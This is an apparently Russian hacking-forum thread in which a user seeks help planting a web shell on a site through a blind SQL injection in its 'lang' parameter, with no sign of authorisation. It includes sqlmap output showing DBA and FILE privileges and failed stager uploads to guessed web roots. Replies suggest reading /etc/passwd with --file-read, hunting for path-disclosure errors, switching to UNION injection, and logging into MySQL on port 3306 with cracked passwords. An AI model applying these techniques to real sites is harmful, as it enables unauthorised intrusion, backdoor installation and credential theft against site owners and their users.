sqlmap заливка шелла

Добрый день прошу помощи со sqlmapom ни как не могу залить шелл
Права у юзера есть
--is-dba: True
%lotos% (administrator) [28]:
privilege: ALTER
privilege: ALTER R
privilege: CREATE
privilege: CREATE
privilege: CREATE
privilege: CREATE
privilege: CREATE
privilege: CREATE
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TA
privilege: PROCESS
privilege: REFEREN
privilege: RELOAD
privilege: REPLICA
privilege: REPLICA
privilege: SELECT
privilege: SHOW DA
privilege: SHOW VI
privilege: SHUTDOW
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE

SELECT @@GLOBAL.secure_file_priv;
'/var/lib/mysql-files/'

 

Где логи действий? Где ответа сервера? Или нам представить нужно что ты делал и что не получается?

 

web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[12:20:48] [INFO] going to use a web backdoor for command prompt
[12:20:48] [INFO] fingerprinting the back-end DBMS operating system
[12:20:48] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[12:21:00] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[12:21:04] [WARNING] unable to automatically parse any web server path
[12:21:04] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[12:21:04] [INFO] heuristics detected web page charset 'ascii'
[12:21:04] [WARNING] unable to upload the file stager on '/var/www/'
[12:21:04] [INFO] trying to upload the file stager on '/var/www/i/pages/' via LIMIT 'LINES TERMINATED BY' method
[12:21:05] [WARNING] unable to upload the file stager on '/var/www/i/pages/'
[12:21:05] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[12:21:06] [WARNING] unable to upload the file stager on '/var/www/html/'
[12:21:06] [INFO] trying to upload the file stager on '/var/www/html/i/pages/' via LIMIT 'LINES TERMINATED BY' method
[12:21:07] [WARNING] unable to upload the file stager on '/var/www/html/i/pages/'
[12:21:07] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[12:21:07] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/'
[12:21:07] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/i/pages/' via LIMIT 'LINES TERMINATED BY' method
[12:21:08] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/i/pages/'
[12:21:08] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method
[12:21:09] [WARNING] unable to upload the file stager on '/var/www/nginx-default/'
[12:21:09] [INFO] trying to upload the file stager on '/var/www/nginx-default/i/pages/' via LIMIT 'LINES TERMINATED BY' method
[12:21:10] [WARNING] unable to upload the file stager on '/var/www/nginx-default/i/pages/'
[12:21:10] [INFO] trying to upload the file stager on '/srv/www/' via LIMIT 'LINES TERMINATED BY' method
[12:21:10] [WARNING] unable to upload the file stager on '/srv/www/'
[12:21:10] [INFO] trying to upload the file stager on '/srv/www/i/pages/' via LIMIT 'LINES TERMINATED BY' method
[12:21:11] [WARNING] unable to upload the file stager on '/srv/www/i/pages/'
[12:21:11] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 43 times

 

почему так много 404, там ваф? путь к doc_root известен или наугад?

 

путь не известен дефолтный список sqlmap
вафа вроде нет но сама скуля типа
Parameter: lang (GET)
Type: boolean-based blind

 

ну так ищите сначала ошибку в сайтах, что-бы раскрывали вам путь.

 

это ясно я искал не нашел думал может подскажут другой какой вариант

 

как?

 

попробуй сначала
--file-read="/etc/passwd" если считает,то нужно директорию найти будет на запись и залить туда через

а не автоподбором
UPD
не заметил , Type: boolean-based blind
не зальешься,нужно union

 

если повезет - открыт 3306, можно подключаться удаленно, и сможешь расшифровать пароль, то как вариант подключиться к бд и оттуда залиться, но все равно надо путь искать

 

пароли не хочет извлекать

 

выше же написано --is-dba: True

 

то есть через блинду вариантов заливок нет